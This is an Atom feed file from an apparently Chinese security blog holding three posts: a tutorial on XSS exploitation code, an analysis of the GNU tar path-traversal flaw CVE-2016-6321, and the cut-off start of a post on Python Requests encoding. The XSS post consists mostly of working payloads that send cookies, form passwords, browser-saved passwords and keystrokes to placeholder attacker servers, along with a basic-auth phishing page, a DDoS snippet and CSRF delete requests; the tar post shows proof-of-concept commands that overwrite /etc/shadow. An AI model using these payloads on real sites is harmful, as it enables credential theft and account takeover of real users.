-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathatom.xml
883 lines (697 loc) · 231 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>wps2015的博客</title>
<link href="/atom.xml" rel="self"/>
<link href="http://wps2015.org/"/>
<updated>2016-12-12T01:52:01.610Z</updated>
<id>http://wps2015.org/</id>
<author>
<name>wps2015</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>XSS常见利用代码及原理</title>
<link href="http://wps2015.org/2016/12/12/usually-used-xss-code/"/>
<id>http://wps2015.org/2016/12/12/usually-used-xss-code/</id>
<published>2016-12-11T16:00:00.000Z</published>
<updated>2016-12-12T01:52:01.610Z</updated>
<content type="html"><![CDATA[<p>XSS是一种经常出现在Web应用中的计算机安全漏洞,它允许恶意Web用户将代码植入到提供给其它用户使用的页面中。常见的利用方式有cookie获取、基础认证钓鱼、表单劫持等。通常,在发现XSS漏洞后,会利用跨站平台里面的payload来进行攻击。但是,要更好的理解XSS的危害,还是需要自己动手来写并理解XSS的攻击代码。<a id="more"></a><br><strong>ps. 本文所涉及代码仅做测试使用,请不要用于非法用途!</strong></p>
<h3 id="Cookie偷取"><a href="#Cookie偷取" class="headerlink" title="Cookie偷取"></a>Cookie偷取</h3><p>XSS最常见的手段大概就是获取Cookie了吧。</p>
<ol>
<li><p>javascript创建img标签,利用img的跨域请求将cookie信息传递到我们的服务器上</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> cookie = <span class="built_in">document</span>.cookie;</span><br><span class="line"><span class="keyword">var</span> ele = <span class="built_in">document</span>.createElement(<span class="string">"img"</span>); <span class="comment">//创建img标签</span></span><br><span class="line"><span class="keyword">var</span> time = <span class="keyword">new</span> <span class="built_in">Date</span>();</span><br><span class="line">ele.src = <span class="string">"http://yourserver.com/xss/xss_cookie/cookie1.php?cookie="</span>+cookie+<span class="string">"&location="</span>+<span class="built_in">window</span>.location.href+<span class="string">"&time="</span>+time; <span class="comment">//cookie获取</span></span><br><span class="line">ele.id = <span class="string">"imgs"</span>;</span><br></pre></td></tr></table></figure>
</li>
<li><p>ajax发起简单跨域请求</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">ajax</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> xmlHttp;</span><br><span class="line"> <span class="keyword">try</span> {</span><br><span class="line"> xmlHttp = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line"> }<span class="keyword">catch</span>(e){</span><br><span class="line"> <span class="keyword">try</span>{</span><br><span class="line"> xmlHttp = <span class="keyword">new</span> ActiveXObject(<span class="string">"Msxml2.XMLHTTP"</span>);</span><br><span class="line"> }<span class="keyword">catch</span>(e){</span><br><span class="line"> <span class="keyword">try</span>{</span><br><span class="line"> xmlHttp = <span class="keyword">new</span> ActiveXObject(<span class="string">"Microsoft.XMLHTTP"</span>);</span><br><span class="line"> }<span class="keyword">catch</span>(e){</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> xmlHttp;</span><br><span class="line">}</span><br><span class="line">xml = ajax(); <span class="comment">//实例化ajax请求对象</span></span><br><span class="line">url = <span class="string">"http://yourserver.com/xss/xss_cookie/cookie1.php?cookie="</span>+<span class="built_in">document</span>.cookie+<span class="string">"&location="</span>+<span class="built_in">window</span>.location.href;</span><br><span class="line">xml.open(<span class="string">"GET"</span>,url,<span class="literal">true</span>); <span class="comment">//若要传递的数据量较大,可利用 POST方法;xml.open("POST",url,true);xml.send("cookie="+cookie+"&location="+locations);</span></span><br><span class="line">xml.send();</span><br></pre></td></tr></table></figure>
</li>
</ol>
<h3 id="基础认证钓鱼"><a href="#基础认证钓鱼" class="headerlink" title="基础认证钓鱼"></a>基础认证钓鱼</h3><p>查了查资料,基础认证钓鱼在2012年流传比较广(那时我还只是孩子呀…),通常是你浏览着网站突然弹出一个基础认证的框。其实,所有可以利用标签插入外部资源的网站都可能存在这个漏洞。通常,在论坛等地方,可以自定义引用外部图片(其实就是利用img标签),将src链接到一个需要基础认证后才行访问的资源,那么就会产生弹窗。用你的路由器后台地址试试。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://192.168.1.1"</span>></span> //大家知道访问路由器后台,是需要基础认证的,这里可以试试</span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure></p>
<p>了解基础认证钓鱼的原理后,可以联想到XSS也是实现该漏洞的一种方式。这里先利用php构造一个基础认证页面fish.php,<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span>($_SERVER[<span class="string">'PHP_AUTH_PW'</span>] ==<span class="string">""</span> || $_SERVER[<span class="string">'PHP_AUTH_USER'</span>] ==<span class="string">""</span> ) </span><br><span class="line">{ </span><br><span class="line">header(<span class="string">'WWW-Authenticate: Basic realm="info you want"'</span>); <span class="comment">//自定义描述</span></span><br><span class="line">header(<span class="string">'HTTP/1.0 401 Unauthorized'</span>); <span class="comment">//401未认证</span></span><br><span class="line">} </span><br><span class="line"><span class="keyword">else</span>{ </span><br><span class="line">$user = $_SERVER[<span class="string">'PHP_AUTH_USER'</span>]; </span><br><span class="line">$pass = $_SERVER[<span class="string">'PHP_AUTH_PW'</span>]; </span><br><span class="line">$fish = <span class="string">"username:"</span>.$user.<span class="string">" password:"</span>.$pass; </span><br><span class="line">header(<span class="string">"location:http://yourserver.com/fish_get.php?c=$fish"</span>); <span class="comment">//受害者在填写用户名和密码后,location跳转到密码接收页面</span></span><br><span class="line">} </span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<p>利用js构造img引用该资源(任何可以引用外部资源的标签,如script)<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> img = <span class="keyword">new</span> Image();</span><br><span class="line">img.src=<span class="string">"http://youserver.com/fish.php"</span></span><br></pre></td></tr></table></figure></p>
<h3 id="表单劫持"><a href="#表单劫持" class="headerlink" title="表单劫持"></a>表单劫持</h3><h5 id="劫持onsubmit方法"><a href="#劫持onsubmit方法" class="headerlink" title="劫持onsubmit方法"></a>劫持onsubmit方法</h5><p>在提交form表单时,通常会调用onsubmit方法。在onsubmit被调用时,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息。<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> f=<span class="built_in">document</span>.forms[<span class="string">'myform'</span>]; <span class="comment">//获取form对象</span></span><br><span class="line"><span class="keyword">if</span>(f==<span class="literal">undefined</span>)</span><br><span class="line">{</span><br><span class="line"> f=<span class="built_in">document</span>.getElementById(<span class="string">'formid'</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">var</span> func=f.onsubmit;</span><br><span class="line">f.onsubmit=<span class="function"><span class="keyword">function</span>(<span class="params">event</span>)</span><br><span class="line"></span>{</span><br><span class="line"> <span class="keyword">var</span> str=<span class="string">''</span>;</span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">var</span> i=<span class="number">0</span>;i<f.elements.length;i++)</span><br><span class="line"> {</span><br><span class="line"> str+=f.elements[i].name+<span class="string">':'</span>+f.elements[i].value+<span class="string">'||'</span>; <span class="comment">//获取form中元素的值</span></span><br><span class="line"> }</span><br><span class="line"> str=str.substr(<span class="number">0</span>,str.length<span class="number">-2</span>);</span><br><span class="line"> <span class="keyword">var</span> img=<span class="keyword">new</span> Image();</span><br><span class="line"> img.src=<span class="string">'http://myserver.com/img.php?data='</span>+<span class="built_in">escape</span>(str)+<span class="string">'&url='</span>+<span class="built_in">escape</span>(location.href); <span class="comment">//将获取的明文密码传递出去</span></span><br><span class="line"> func(event);</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<h5 id="修改action指向"><a href="#修改action指向" class="headerlink" title="修改action指向"></a>修改action指向</h5><p>通过js将form表单中的action地址修改,也可偷取明文密码<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> f=<span class="built_in">document</span>.forms[<span class="string">'myform'</span>];</span><br><span class="line"><span class="keyword">if</span>(f==<span class="literal">undefined</span>)</span><br><span class="line">{</span><br><span class="line"> f=<span class="built_in">document</span>.getElementById(<span class="string">'formid'</span>);</span><br><span class="line">}</span><br><span class="line">f.action = <span class="string">"http://myserver.com/accept.php"</span>; <span class="comment">//在 accept.php中接受POST过来的字段</span></span><br></pre></td></tr></table></figure></p>
<p>但是这种方式容易被CSP拦截(限制action指向的页面所在域)</p>
<h5 id="获取浏览器记住的明文密码"><a href="#获取浏览器记住的明文密码" class="headerlink" title="获取浏览器记住的明文密码"></a>获取浏览器记住的明文密码</h5><p>在用户登录时,浏览器通常会提示保存密码。点击保存后,下次再次访问该登录页面,浏览器会自动将保存的用户名和密码填充。所以,利用XSS在目标域下构建一个表单,若受害者在浏览器中保存了密码,那么便可以利用自动填充 的机制获取到明密码。<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">create_form</span>(<span class="params">user</span>) </span>{ <span class="comment">/*获取明文密码*/</span></span><br><span class="line"> <span class="keyword">var</span> f = <span class="built_in">document</span>.createElement(<span class="string">"form"</span>);</span><br><span class="line"> <span class="built_in">document</span>.getElementsByTagName(<span class="string">"body"</span>)[<span class="number">0</span>].appendChild(f);</span><br><span class="line"> <span class="keyword">var</span> e1 = <span class="built_in">document</span>.createElement(<span class="string">"input"</span>);</span><br><span class="line"> e1.type = <span class="string">"text"</span>;</span><br><span class="line"> e1.name = e1.id = <span class="string">"username"</span>;</span><br><span class="line"> e1.value = user;</span><br><span class="line"> f.appendChild(e1);</span><br><span class="line"> <span class="keyword">var</span> e = <span class="built_in">document</span>.createElement(<span class="string">"input"</span>);</span><br><span class="line"> e.name = e.type = e.id = <span class="string">"password"</span>;</span><br><span class="line"> f.appendChild(e);</span><br><span class="line"> setTimeout(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> img = <span class="keyword">new</span> Image();</span><br><span class="line"> img.src = <span class="string">"http://yourserver.com/img.php?username="</span> + <span class="built_in">document</span>.getElementById(<span class="string">"username"</span>).value + <span class="string">"&password="</span> + <span class="built_in">document</span>.getElementById(<span class="string">"password"</span>).value;</span><br><span class="line"> }, <span class="number">3000</span>); <span class="comment">// 时间竞争</span></span><br><span class="line">}</span><br><span class="line">create_form(<span class="string">''</span>);</span><br></pre></td></tr></table></figure></p>
<p>当然这种方法也跟浏览器是否支持有关,作者在FireFox默认配置下测试成功,最新版chrome默认没有提示保存密码。该方法的详细介绍参考余弦大牛 <a href="http://blog.knownsec.com/2012/02/xss_hack-steal_pwd_of_browsers/" target="_blank" rel="external">XSS Hack:获取浏览器记住的明文密码</a></p>
<h5 id="键盘记录"><a href="#键盘记录" class="headerlink" title="键盘记录"></a>键盘记录</h5><p>键盘记录在系统木马中经常出现,但是利用js也可获取在浏览器界面上键盘记录<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> keys=<span class="string">''</span>;</span><br><span class="line"><span class="built_in">document</span>.onkeypress = <span class="function"><span class="keyword">function</span>(<span class="params">e</span>) </span>{</span><br><span class="line"> get = <span class="built_in">window</span>.event?event:e;</span><br><span class="line"> key = get.keyCode?get.keyCode:get.charCode;</span><br><span class="line"> key = <span class="built_in">String</span>.fromCharCode(key);</span><br><span class="line"> keys+=key;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">window</span>.setInterval(<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">new</span> Image().src = <span class="string">'http://yourserver.com/g.php?c='</span>+keys; <span class="comment">//在服务器上接收</span></span><br><span class="line"> keys = <span class="string">''</span>;</span><br><span class="line">}, <span class="number">1000</span>); <span class="comment">//每间隔1秒向服务器传递键盘记录,并重置keys</span></span><br></pre></td></tr></table></figure></p>
<h3 id="DDos攻击"><a href="#DDos攻击" class="headerlink" title="DDos攻击"></a>DDos攻击</h3><p>利用js可以很轻易向外域发起请求,这个特性导致XSS被利用进行DDos攻击。YouTube、搜狐等流量巨大的网站,就曾经因为存储型XSS被攻击者利用进行大规模的DDos。这里用youtube事件中攻击代码作为参考:<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><img src=<span class="string">"/imagename.png"</span> onload=<span class="string">"$.getScript("</span>http:<span class="comment">//c&cdomain.com/index1.html")">//漏洞存在点位于头像处,头像加载后恶意js也被加载</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">ddos</span>(<span class="params">url</span>)</span>{</span><br><span class="line">$(<span class="string">"body"</span>).append(<span class="string">"<iframe id="</span>ifr11323<span class="string">" style="</span>display:none;<span class="string">" src="</span>http:<span class="comment">//c&cdomain.com/index2.html"></iframe>")//加载一个隐藏iframe指向攻击者的设定页面</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><html><span class="xml"><span class="tag"></<span class="name">body</span>></span></span><span class="xml"><span class="tag"><<span class="name">h1</span>></span>iframe<span class="tag"></<span class="name">h1</span>></span></span></span><br><span class="line"><script></span><br><span class="line">ddos(<span class="string">"http://www.target1.com/1.jpg"</span>,<span class="string">"http://www.target2.com/1.jpg"</span>); <span class="comment">//攻击目标</span></span><br><span class="line">fucntion ddos(url1,url2){</span><br><span class="line"><span class="built_in">window</span>.setInterval(){</span><br><span class="line">$.getScript(url1);</span><br><span class="line">$.getScript(url2);</span><br><span class="line">},<span class="number">1000</span> <span class="comment">//1秒钟发送一次get请求</span></span><br><span class="line">};</span><br><span class="line"><span class="xml"><span class="tag"></<span class="name">script</span>></span></span><span class="xml"><span class="tag"></<span class="name">body</span>></span></span><span class="xml"><span class="tag"></<span class="name">html</span>></span></span></span><br></pre></td></tr></table></figure></p>
<p>事件详细请见<a href="http://thehackernews.com/2014/04/vulnerability-in-worlds-largest-site.html" target="_blank" rel="external">Vulnerability In Worlds’ Largest Site</a></p>
<h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>CSRF(跨站请求伪造)并不依赖于XSS漏洞,但是XSS也是进行CSRF攻击的一种方式。对于GET型<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> action = <span class="keyword">new</span> Image();</span><br><span class="line">action.src = <span class="string">"http://www.target.com/index.php?action=delete&id=123"</span> <span class="comment">//删除某个值</span></span><br></pre></td></tr></table></figure></p>
<p>POST型<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">ajax</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> xmlHttp;</span><br><span class="line"> <span class="keyword">try</span> {</span><br><span class="line"> xmlHttp = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line"> }<span class="keyword">catch</span>(e){</span><br><span class="line"> <span class="keyword">try</span>{</span><br><span class="line"> xmlHttp = <span class="keyword">new</span> ActiveXObject(<span class="string">"Msxml2.XMLHTTP"</span>);</span><br><span class="line"> }<span class="keyword">catch</span>(e){</span><br><span class="line"> <span class="keyword">try</span>{</span><br><span class="line"> xmlHttp = <span class="keyword">new</span> ActiveXObject(<span class="string">"Microsoft.XMLHTTP"</span>);</span><br><span class="line"> }<span class="keyword">catch</span>(e){</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> xmlHttp;</span><br><span class="line">}</span><br><span class="line">xml = ajax(); <span class="comment">//实例化ajax请求对象</span></span><br><span class="line">url = <span class="string">"http://www.target.com/index.php"</span>;</span><br><span class="line">xml.open(<span class="string">"POST"</span>,url,<span class="literal">true</span>)</span><br><span class="line">xml.send(<span class="string">"action=delete&id=123"</span>); <span class="comment">//删除某个值</span></span><br><span class="line">xml.send();</span><br></pre></td></tr></table></figure></p>
]]></content>
<summary type="html">
<p>XSS是一种经常出现在Web应用中的计算机安全漏洞,它允许恶意Web用户将代码植入到提供给其它用户使用的页面中。常见的利用方式有cookie获取、基础认证钓鱼、表单劫持等。通常,在发现XSS漏洞后,会利用跨站平台里面的payload来进行攻击。但是,要更好的理解XSS的危害,还是需要自己动手来写并理解XSS的攻击代码。
</summary>
<category term="Web安全" scheme="http://wps2015.org/categories/Web%E5%AE%89%E5%85%A8/"/>
<category term="xss" scheme="http://wps2015.org/tags/xss/"/>
</entry>
<entry>
<title>Tar解压路径绕过漏洞分析(CVE-2016-6321)</title>
<link href="http://wps2015.org/2016/11/08/the-test-of-Tar-extract-pathname-bypass/"/>
<id>http://wps2015.org/2016/11/08/the-test-of-Tar-extract-pathname-bypass/</id>
<published>2016-11-07T16:00:00.000Z</published>
<updated>2016-11-09T03:25:43.243Z</updated>
<content type="html"><![CDATA[<p>安全研究人员Harry Sintonen等发现了linux中利用tar解压时存在目录传送绕过漏洞,原始漏洞分析在<a href="https://sintonen.fi/advisories/tar-extract-pathname-bypass.txt" target="_blank" rel="external">此处</a><a id="more"></a></p>
<h3 id="影响范围"><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h3><ul>
<li>GNU tar 1.14 to 1.29 (包含1.29)</li>
<li>Red Hat、Alpine Linux、Red Star OS等(任何使用GNU tar的linux)</li>
</ul>
<h3 id="漏洞原因"><a href="#漏洞原因" class="headerlink" title="漏洞原因"></a>漏洞原因</h3><p>利用tar指令在解压压缩包时,遇到文件名为<code>..</code>时,会将<code>..</code>及之前的目录结构去掉以使得文件名变得更加安全;并且使得剩下的文件名与解压目录成相对路径,但这同样会导致安全问题。</p>
<h3 id="漏洞测试"><a href="#漏洞测试" class="headerlink" title="漏洞测试"></a>漏洞测试</h3><p>下载测试<a href="https://sintonen.fi/advisories/tar-poc.tar" target="_blank" rel="external">exp</a>,以root权限执行tar指令</p>
<h4 id="在根目录下解压,不指定解压文件"><a href="#在根目录下解压,不指定解压文件" class="headerlink" title="在根目录下解压,不指定解压文件"></a>在根目录下解压,不指定解压文件</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/<span class="comment"># tar xvf tar-poc.tar</span></span><br></pre></td></tr></table></figure>
<p>可以发现<code>etc/mod/../</code>被删除后,在当前目录(根目录)下的相对地址为<code>etc/shadow</code>,从而得到解压后的绝对地址为<code>/etc/shadow</code>,导致shadow被覆盖了。<br><img src="https://img.alicdn.com/imgextra/i1/792076116/TB230wYbZeJ.eBjy0FiXXXqapXa_!!792076116.png" alt=""></p>
<h4 id="在任一目录下解压,不指定解压文件"><a href="#在任一目录下解压,不指定解压文件" class="headerlink" title="在任一目录下解压,不指定解压文件"></a>在任一目录下解压,不指定解压文件</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/home/wps2015<span class="comment"># tar xvf tar-poc.tar</span></span><br></pre></td></tr></table></figure>
<p>可以看到文件被解压到了当前目录下的<code>etc/shadow</code><br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2j3Q5czm2.eBjSZFtXXX56VXa_!!792076116.png" alt=""></p>
<h4 id="在任意目录下解压,指定解压目录”-C-“"><a href="#在任意目录下解压,指定解压目录”-C-“" class="headerlink" title="在任意目录下解压,指定解压目录”-C /“"></a>在任意目录下解压,指定解压目录”-C /“</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/home/wps2015<span class="comment"># tar xvf tar-poc.tar -C /</span></span><br></pre></td></tr></table></figure>
<p>可以看到<code>/etc/shadow</code>被覆盖成功<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2IiE6cp5N.eBjSZFKXXX_QVXa_!!792076116.png" alt=""></p>
<h4 id="在任意目录下解压,指定解压文件"><a href="#在任意目录下解压,指定解压文件" class="headerlink" title="在任意目录下解压,指定解压文件"></a>在任意目录下解压,指定解压文件</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/home/wps2015<span class="comment"># tar xvf tar-poc.tar etc/motd/</span></span><br></pre></td></tr></table></figure>
<p>指定解压文件也可以解压成功<br><img src="https://img.alicdn.com/imgextra/i4/792076116/TB2hwZYbY1K.eBjSsphXXcJOXXa_!!792076116.png" alt=""></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>该漏洞需要满足较多条件,如需要较高权限(root),需要在指定目录下解压文件等。</p>
]]></content>
<summary type="html">
<p>安全研究人员Harry Sintonen等发现了linux中利用tar解压时存在目录传送绕过漏洞,原始漏洞分析在<a href="https://sintonen.fi/advisories/tar-extract-pathname-bypass.txt">此处</a>
</summary>
<category term="漏洞分析" scheme="http://wps2015.org/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<category term="linux" scheme="http://wps2015.org/tags/linux/"/>
</entry>
<entry>
<title>解决Requests抓取中文网页乱码问题</title>
<link href="http://wps2015.org/2016/10/28/how-to-requests-chinese-in-python/"/>
<id>http://wps2015.org/2016/10/28/how-to-requests-chinese-in-python/</id>
<published>2016-10-27T16:00:00.000Z</published>
<updated>2016-11-08T01:47:54.552Z</updated>
<content type="html"><![CDATA[<p>Requests是用Python语言编写,使用的是urllib3,拥有了它的所有特性,Requests 支持 HTTP 连接保持和连接池,支持使用 cookie 保持会话,支持文件上传,支持自动确定响应内容的编码,支持国际化的 URL 和 POST 数据自动编码。现代、国际化、人性化。正是由于它的强大,所以现在被广泛的用于爬虫等方面,但是在对中文网页进行抓取的时候,或多或少会遇到一些编码问题,本文就这些问题讨论一下。<a id="more"></a></p>
